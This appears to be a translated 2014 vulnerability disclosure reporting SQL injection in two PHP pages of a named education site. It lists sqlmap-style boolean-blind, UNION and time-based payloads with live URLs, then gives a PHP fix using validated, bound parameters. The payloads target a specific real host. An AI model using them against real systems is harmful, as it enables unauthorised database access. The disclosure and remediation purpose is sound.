2014-06-19: Details reported to the vendor; awaiting vendor handling.
2014-06-24: The vendor chose to ignore the vulnerability; details disclosed to the public.
As per the title.
Multiple SQL injection points. Example: http://www1.openedu.com.cn/ycjy/fengmian_new.php?id=447&mid=132&dbname=fengmain
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=447 AND 1204=1204&mid=132&dbname=fengmain

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=-1089 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(113)+CHAR(121)+CHAR(111)+CHAR(113)+CHAR(116)+CHAR(79)+CHAR(66)+CHAR(113)+CHAR(100)+CHAR(113)+CHAR(66)+CHAR(97)+CHAR(117)+CHAR(100)+CHAR(113)+CHAR(116)+CHAR(112)+CHAR(101)+CHAR(113),NULL,NULL,NULL-- &mid=132&dbname=fengmain

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: id=447 AND 3287=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)&mid=132&dbname=fengmain
http://www1.openedu.com.cn/file_post/display/read.php?FileID=21696
Place: GET
Parameter: FileID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: FileID=21696 AND 7547=7547

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: FileID=21696 AND 1236=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Fix suggestion: SQL filtering.
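As an added illustration of the fix (this is not openedu.com.cn's code; the report does not show the site's source), the following PHP contrasts the concatenation pattern that the sqlmap findings imply with a hardened handler for the same three query-string parameters. Everything beyond the parameter names on the page is assumed: PHP 8 with pdo_sqlsrv, a table `fengmian` with columns `title` and `body`, the names `fetchCoverVulnerable`, `fetchCoverSafe`, `requireIntParam`, `resolveDbName`, and a password in the `DB_PASSWORD` environment variable.

```php
<?php
// Added example for this report (not openedu.com.cn's code, whose source the
// report does not show). Assumed: PHP 8 with pdo_sqlsrv, a table `fengmian`
// with columns `title` and `body`, and a credential in DB_PASSWORD.

// Vulnerable pattern (assumed) that the sqlmap findings imply: the raw
// query-string values are concatenated into the statement, so anything that
// follows the number is executed as SQL. Kept only to contrast with the
// hardened version below.
function fetchCoverVulnerable(PDO $db, string $id, string $mid): array|false
{
    $sql = "SELECT title, body FROM fengmian WHERE id = $id AND mid = $mid";
    return $db->query($sql)->fetch(PDO::FETCH_ASSOC);
}

// Step 1: type-validate. FILTER_VALIDATE_INT accepts only a plain integer,
// so a value carrying trailing SQL never reaches the query at all.
function requireIntParam(array $params, string $name): int
{
    $value = filter_var(
        $params[$name] ?? null,
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    if ($value === false) {
        http_response_code(400);
        exit('invalid parameter: ' . htmlspecialchars($name));
    }
    return $value;
}

// Step 2: bind the validated values as parameters instead of interpolating.
function fetchCoverSafe(PDO $db, int $id, int $mid): array|false
{
    $stmt = $db->prepare(
        'SELECT title, body FROM fengmian WHERE id = :id AND mid = :mid'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':mid', $mid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// The affected URL also takes the database name from the query string.
// Identifiers cannot be bound, so resolve them through an allow-list.
const ALLOWED_DBNAMES = ['fengmain'];  // assumed: the only name the page shows

function resolveDbName(string $requested): string
{
    if (!in_array($requested, ALLOWED_DBNAMES, true)) {
        http_response_code(400);
        exit('unknown database');
    }
    return $requested;
}

$dbName = resolveDbName($_GET['dbname'] ?? '');
$id     = requireIntParam($_GET, 'id');
$mid    = requireIntParam($_GET, 'mid');

$db = new PDO(
    "sqlsrv:Server=localhost;Database=$dbName",
    'app_user',
    (string) getenv('DB_PASSWORD'),
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,  // real server-side parameters
    ]
);

$row = fetchCoverSafe($db, $id, $mid);
header('Content-Type: application/json; charset=utf-8');
echo json_encode($row ?: ['error' => 'not found']);
```

The same two steps apply to `FileID` in read.php. Typed validation plus parameter binding removes the whole class of bug for these numeric parameters, whereas filtering individual SQL keywords only addresses the payloads one happens to anticipate; the allow-list for `dbname` is needed because a database name is an identifier and cannot be passed as a bound parameter.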
Severity: no impact, vendor ignored
Ignored at: 2014-06-24 09:18
None for now